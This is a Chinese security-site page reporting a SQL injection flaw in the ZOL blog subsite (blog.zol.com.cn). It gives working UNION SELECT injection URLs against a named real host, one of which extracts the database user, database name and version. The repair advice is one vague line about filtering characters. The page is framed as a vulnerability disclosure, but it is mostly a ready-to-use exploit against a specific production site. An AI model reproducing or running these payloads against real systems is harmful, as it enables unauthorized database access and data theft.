手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >中关村在线博客子站SQL注入及修复方案
中关村在线博客子站SQL注入及修复方案
摘要:http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0unionselect1,...

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

中关村在线博客子站SQL注入及修复方案1

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--

中关村在线博客子站SQL注入及修复方案2

中关村在线博客子站SQL注入及修复方案3

中关村在线博客子站SQL注入及修复方案4

修复方案:

过滤参数提交非法字符或者拦截敏感字符等等。。。

【中关村在线博客子站SQL注入及修复方案】相关文章:

.Net开发人员常犯的6大安全错误

IIS 7.0 网站漏洞利用及修复方法

微软IE5与IE6存在 FTP跨站命令注入漏洞

时时送订单系统后台登陆框post注入的方法介绍以及修复方案

Persits Software XUpload.ocx 含远程栈溢出漏洞

傲游浏览器命令执行漏洞介绍以及修复方案

Microsoft SharePoint 服务器源码 HTML 注入漏洞

Ewebeditor 的一些漏洞总结 推荐

人人网CSRF漏洞曝光及修复方案

腾讯QQ空间的跨站漏洞介绍以及修复解决的方案(图)

精品推荐
分类导航